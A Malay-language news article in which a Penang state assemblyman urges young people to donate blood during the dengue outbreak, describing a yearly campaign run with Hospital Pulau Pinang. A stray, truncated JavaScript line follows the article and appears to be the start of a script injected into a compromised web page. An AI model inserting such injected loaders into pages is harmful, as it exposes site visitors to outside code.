ADUN seru lebih ramai belia derma darah

GEORGE TOWN – Ekoran keadaan wabak denggi yang masih serius di negeri ini, Ahli Dewan Undangan Negeri (ADUN) Komtar, Teh Lai Heng menyeru agar lebih ramai golongan belia tampil menyertai kempen derma darah bagi memastikan bekalan darah di hospital adalah mencukupi.

Menurutnya, golongan belia mempunyai pengaruh rakan sebaya yang kuat sekaligus dilihat dapat menarik lebih ramai dalam kalangan mereka untuk menderma darah.

“Golongan belia merupakan golongan yang aktif bersosial dan mempunyai jaringan rakan sebaya yang luas.

“Sekiranya salah seorang daripada kelompok mereka hadir menyertai kempen ini, saya percaya akan ada lebih ramai lagi tampil menyertai kempen sebegini,” ucapnya pada Majlis Perasmian Projek Komuniti Menderma Darah anjuran bersama-sama Pusat Khidmat ADUN Komtar, Persatuan Bomba Sukarela Paya Terubong, Cheng Leng Tuah dan AngKongKeng.com di sini baru-baru ini.

Jelas beliau, selain menambah bekalan darah sedia ada, kempen yang turut mendapat kerjasama Hospital Pulau Pinang (HPP) tersebut juga bertujuan mendidik orang ramai terutamanya belia supaya tidak takut menderma darah demi kebaikan orang lain.

“Penglibatan orang ramai dalam kempen ini membuktikan bahawa kesedaran tentang kebaikan menderma darah adalah masih kurang, namun, kita tidak akan berputus asa dan akan terus mengadakan kempen sebegini pada masa hadapan,” ujar beliau.

Kempen yang diadakan secara tahunan sejak 2014 tersebut mensasarkan 150 pain darah bagi setiap kempen.

var d=document;var s=d.createElement(‘script’);